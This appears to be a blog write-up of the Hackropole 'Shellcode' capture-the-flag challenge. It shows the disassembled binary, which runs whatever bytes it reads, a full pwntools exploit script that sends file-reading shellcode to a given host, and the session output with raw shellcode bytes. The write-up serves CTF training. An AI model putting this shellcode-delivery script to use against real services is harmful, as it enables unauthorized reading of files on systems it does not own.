Shellcode | Hackropole
Shellcode | Hackropole
Shellcode
Ressources
Link : Hackropole/pwn/shellcode
Files :
docker-compose.yml
execut0r
Analysis
Code reading
1
2
3
4
5
6
7
8
9
10
push rbp
mov rbp,rsp
sub rsp,0x200
lea rax,[rbp-0x200]
mov edx,0x200
mov rsi,rax
mov edi,0x0
call 0x1030 <read@plt>
lea rax,[rbp-0x200]
call rax
We can see in the main function taht is not realy an hacking challenge but just a programme that can get 0x200 bytes of shellcode and execute it.
Exploit
Our goal is to create a shellcode that will display the content of flag.txt. The simpliest way is by doing :
1
asm(shellcraft.cat("flag.txt"))
Complete exploit :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin/env python3
from pwn import *
import argparse
context.arch = "amd64"
def get_args():
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument("-?", "--help", action="help", help="show this help message and exit")
parser.add_argument("-t", "--timeout", help="Timeout while receiving response", default=5, type=float)
parser.add_argument("-l", "--local", help="File path to the binary", type=str)
parser.add_argument("-p", "--port", help="Remote port", type=int)
parser.add_argument("-h", "--host", help="Remote host", type=str)
args = parser.parse_args()
return args
def main(args):
if args.local:
target = process(args.local)
elif args.host and args.port:
target = remote(args.host, args.port)
payload = asm(shellcraft.cat("flag.txt"))
print(f"[>] {payload}")
target.sendline(payload)
flag = target.recvuntil(b'}')
print(f"[<] {flag}")
exit(0)
if __name__ == "__main__":
args = get_args()
main(args)
Getting flag
1
2
3
4
5
./exploit.py -h 127.0.0.1 -p 4000
[+] Opening connection to 127.0.0.1 on port 4000: Done
[>] b'j\x01\xfe\x0c$H\xb8flag.txtPj\x02XH\x89\xe71\xf6\x0f\x05A\xba\xff\xff\xff\x7fH\x89\xc6j(Xj\x01_\x99\x0f\x05'
[<] b'FCSC{9f8a............................................4f7a}'
[*] Closed connection to 127.0.0.1 port 4000
This post is licensed under CC BY 4.0 by the author.